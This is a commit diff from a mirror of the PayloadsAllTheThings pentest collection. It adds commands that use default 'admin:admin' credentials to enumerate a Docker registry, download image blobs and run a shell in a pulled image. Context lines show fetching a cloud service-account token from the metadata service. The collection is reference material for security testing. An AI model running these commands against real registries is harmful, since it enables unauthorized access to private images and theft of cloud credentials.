mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Docker Registry - Pull/Download
This commit is contained in:
parent
f748af16d2
commit
6e7af5a267
1 changed files with 18 additions and 1 deletions
|
@ -70,6 +70,24 @@ Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. The
|
||||||
```powershell
|
```powershell
|
||||||
curl https://registry.example.com/v2/<image_name>/tags/list
|
curl https://registry.example.com/v2/<image_name>/tags/list
|
||||||
docker pull https://registry.example.com:443/<image_name>:<tag>
|
docker pull https://registry.example.com:443/<image_name>:<tag>
|
||||||
|
|
||||||
|
# connect to the endpoint and list image blobs
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest
|
||||||
|
# download blobs
|
||||||
|
curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz
|
||||||
|
# automated download
|
||||||
|
https://github.com/NotSoSecure/docker_fetch/
|
||||||
|
python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local
|
||||||
|
```
|
||||||
|
|
||||||
|
Access a private registry and start a container with one of its image
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
docker login -u admin -p admin docker.registry.local
|
||||||
|
docker pull docker.registry.local/wordpress-image
|
||||||
|
docker run -it docker.registry.local/wordpress-image /bin/bash
|
||||||
```
|
```
|
||||||
|
|
||||||
Access a private registry using OAuth Token from Google
|
Access a private registry using OAuth Token from Google
|
||||||
|
@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service
|
||||||
docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
|
docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Exploit privileged container abusing the Linux cgroup v1
|
## Exploit privileged container abusing the Linux cgroup v1
|
||||||
|
|
||||||
Prerequisite (at least one):
|
Prerequisite (at least one):
|
||||||
|
|
Loading…
Reference in a new issue